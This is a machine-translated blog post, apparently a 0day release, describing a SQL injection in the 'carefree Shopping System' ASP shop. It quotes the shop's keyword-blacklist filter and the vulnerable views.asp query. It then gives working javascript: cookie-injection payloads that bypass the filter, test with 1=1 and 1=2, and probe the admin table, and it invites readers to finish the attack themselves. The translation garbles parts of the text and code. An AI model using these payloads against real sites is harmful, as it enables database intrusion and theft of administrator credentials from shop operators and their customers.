Oday release of carefree Shopping System

Xiaoz Blog

In fact, SQLintection appears in the code, but in Conn. asp:

Set Conn = Nothing
Response. Write "database connection error"
Response. End
End If
%> <! -- # Include file = "sqlcheck. asp" -->

Open sqlcheck. asp, part of the code is as follows:

For Fy_x = 0 to ubound (Fy_Cs)
If Fy_Cs (Fy_x) <> "" Then
If Instr (LCase (Request (Fy_Cs (Fy_x), "") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "and ") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "select") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x ))), "update") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "chr ") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "delete % 20 from ") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), ";") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x ))), "insert") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "mid ") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "master. ") <> 0 Then
Response. Write "<script language = javascript> alert (an error occurs. Please do not try this operation !); History. go (-1); </script>"
Response. End

A lot of filtering results ~ | And | select | update | mid |... and so on --

But the problem is not very serious ~~ Paste the following code to view views. asp:

<% Hw_id = Request ("hw_id ")
SQL = "select * from hw where hw_id =" & hw_id &""
Rs. open SQL, conn, 3, 3
If rs. eof then %> <tr> <td height = "200" colspan = "3" align = "center" & gt; the item you want to view is not found, you can <a href = "search. asp "> <font color =" # FF0000 "& gt; click here for a detailed search </font> </a>! </Td> </tr>
<% Else
Rs ("hw_views") = rs ("hw_views") + 1
Rs. update

We can see that hw_id = Request ("hw_id"), if the administrator directly:

Hw_id = Requet (Replace ("hw_id", "", "") or hw_id = Requet (Replace ("hw_id ","",""")) maybe it's hard for me ~~

(Ps: Well, since the launch of anti-injection code in China, programmers have become lazy ~~~)

The request set contains cookies, so no matter how much BT the anti-injection code he has, we can ignore them :)

The test code is as follows:

Http://www.xxx.com/views.asp? Hw_id = 503

Submit after clearing: javascript: alert (document. cookie = "hw_id =" + escape ("503 and 1 = 1 "))

Javascript: alert (document. cookie = "hw_id =" + escape ("503 and 1 = 2 "))

Determine whether the injection exists.

Javascript: alert (document. cookie = "hw_id =" + escape ("506 and (select count (admin_name) from admin)> 0 "))

OK. Let's get it done by yourself ~~